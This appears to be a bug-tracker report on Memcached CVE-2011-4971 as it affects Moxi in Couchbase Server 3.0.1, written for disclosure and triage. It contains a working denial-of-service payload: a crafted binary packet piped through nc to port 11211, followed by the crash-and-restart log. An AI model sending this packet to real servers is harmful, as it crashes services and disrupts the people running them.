Details
Description
Memcached has a bug CVE-2011-4971,
"Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet."
I tried this out on CB Server 3.0.1, it causes Moxi to restart but didn't seem to interrupt operations or cause a need to warmup the cache. Is Moxi restarting a concern ?
Steps to reproduce:
echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211
Result:
Port server moxi on node 'babysitter_of_ns_1@127.0.0.1' exited with status 139. Restarting. Messages: 2014-11-25 13:50:47: (/home/buildbot/buildbot_slave/debian-7-x64-301-builder/build/build/moxi/src/cproxy_config.c.327) env: MOXI_SASL_PLAIN_USR (1)
2014-11-25 13:50:47: (/home/buildbot/buildbot_slave/debian-7-x64-301-builder/build/build/moxi/src/cproxy_config.c.336) env: MOXI_SASL_PLAIN_PWD (32)